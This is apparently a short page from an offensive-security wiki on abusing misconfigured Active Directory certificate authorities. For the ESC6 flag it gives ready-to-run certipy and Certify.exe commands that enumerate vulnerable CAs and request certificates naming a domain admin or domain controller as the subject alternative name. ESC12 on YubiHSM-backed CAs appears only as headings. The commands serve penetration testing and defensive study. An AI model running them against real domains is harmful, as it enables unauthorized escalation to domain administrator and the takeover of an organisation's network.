Certificate authority
Theory
Certificate Authority misconfiguration
YubiHSM Key Storage Provider
Practice
EDITF_ATTRIBUTESUBJECTALTNAME2 (ESC6)
certipy find -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -stdout | grep "User Specified SAN"#To specify a user account in the SAN
certipy req -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -ca 'ca_name' -template 'vulnerable template' -upn 'domain admin'
#To specify a computer account in the SAN
certipy req -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -ca 'ca_name' -template 'vulnerable template' -dns 'dc.domain.local'Certify.exe casCertify.exe /enrolleeSuppliesSubject
Certify.exe /clientauthCertify.exe request /ca:'domain\ca' /template:"Certificate template" /altname:"admin"Shell access to ADCS CA with YubiHSM (ESC12)
Redirect the USB device server
Forge a certificate
Resources
Last updated
Was this helpful?
